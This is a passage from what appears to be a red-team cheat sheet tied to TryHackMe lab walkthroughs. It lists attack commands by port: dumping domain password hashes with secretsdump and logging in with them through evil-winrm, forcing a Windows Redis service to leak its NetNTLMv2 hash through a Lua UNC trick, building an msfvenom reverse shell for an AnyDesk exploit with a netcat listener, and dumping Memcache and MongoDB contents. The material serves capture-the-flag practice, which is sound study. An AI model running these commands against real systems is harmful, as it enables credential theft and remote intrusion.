Same tooling as TCP/5986 below; evil-winrm targets 5985 by default and needs `-S` for the TLS port 5986.

## **TCP/5986 - WinRM (HTTPS)**

### **Dump Hashes**

If the account you hold is allowed to replicate directory secrets (DCSync rights, e.g. Domain Admins), dump every user's hashes. The NT hashes can then be passed straight to evil-winrm to log in as those users.

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

**Kali**

```
# on Kali the packaged wrapper is impacket-secretsdump; NTLM lines look like user:rid:LMhash:NThash:::
python3 /usr/local/bin/secretsdump.py $DOMAIN/$USER:$PASSWORD@$VICTIM > allhashes.txt
# field 4 is the NT hash (field 3 is the LM hash, useless for pass-the-hash); ':::$' keeps only the NTLM lines
grep ':::$' allhashes.txt | awk -F: '{print $1 ":" $4}' | sort -u
```

### Login with found username and password

**Examples**

[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md#tampering-with-unprivileged-accounts)

```
evil-winrm -u $USER -p $PASSWORD -i $VICTIM
```

### Login with found username and hash

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

[Windows Local Persistence](/red-team/walkthroughs/tryhackme/windows-local-persistence.md)

```
evil-winrm -i $VICTIM -u $VICTIMUSERNAME  -H $FOUNDHASH
```

## TCP/6379 - Redis

**Example**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md#tcp-6379-redis)

```
redis-cli -h $VICTIM -a "$PASSWORD"
$VICTIM:6379> KEYS *
$VICTIM:6379> KEYS "$PATTERN"
$VICTIM:6379> GET "$KEY"           # string values
$VICTIM:6379> LRANGE "$KEY" 0 -1   # whole list: indices are 0-based and -1 is the last element
```

### **Capture the service account's NetNTLMv2 hash (Windows Redis)**

**Example**

[VulnNet: Active](/red-team/walkthroughs/tryhackme/vulnnet-active.md#tcp-139-netbios-1)

**Kali(redis-cli)**

```
config get *
```

**Kali**

```
responder -I $INTERFACE -dvw   # the interface facing the target, e.g. tun0
```

The Lua `dofile` call makes the Redis process open a UNC path, so a Redis service running on Windows authenticates to our Responder listener over SMB and leaks its NetNTLMv2 hash. The share name is arbitrary and does not need to exist.

**Kali(redis-cli)**

```
eval "dofile('//$KALI/share')" 0
```

## TCP/7070 - AnyDesk

**Example**

[Annie](/red-team/walkthroughs/tryhackme/annie.md)

**Exploit:** <https://www.exploit-db.com/raw/49613> (AnyDesk 5.5.2 remote code execution). TCP/7070 is what a TCP scan shows; the exploit itself sends its payload to AnyDesk's discovery service on UDP/50001.

Using that exploit, only the shellcode and the target IP variable need changing. Regenerate the shellcode with the same bad characters the exploit avoids:

**Kali**

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
```

**Kali**

```
nc -lvnp 4444
```

## TCP/11211 - Memcache

### Dump cache

**Example**

[Wekor](/red-team/walkthroughs/tryhackme/wekor.md#tcp-11211-memcache)

**Victim**

```
cd /usr/share/memcached/scripts/
./memcached-tool localhost:11211 dump   # 11211 is the default memcached port
```

## TCP/27017 - MongoDB

**Example**

[Road](/red-team/walkthroughs/tryhackme/road.md#tcp-27017-mongo)

### Find Info in DB

**Victim**

```
mongo
```

**Victim(mongo)**

```
show dbs
use $DBNAME
show collections
db.$COLLECTION.find()    # dump every document in the collection
exit
```

## Knock

**Example**

[The Great Escape](/red-team/walkthroughs/tryhackme/the-great-escape.md)

Usually used in CTFs. Knock on certain ports in a certain pattern to open up more ports.

**Kali**

```
git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
```

